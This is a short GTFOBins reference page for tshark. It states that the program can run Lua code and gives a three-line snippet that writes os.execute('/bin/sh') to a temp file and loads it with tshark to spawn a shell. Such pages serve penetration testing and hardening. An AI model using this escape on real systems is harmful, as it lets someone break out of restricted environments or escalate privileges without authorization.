GTFOBins.github.io/_gtfobins/tshark.md
2021-06-18 14:12:25 +02:00

10 lines
213 B
Markdown

---
description: This program is able to execute [`lua`](/gtfobins/less/) code.
functions:
shell:
- code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' >$TF
tshark -Xlua_script:$TF
---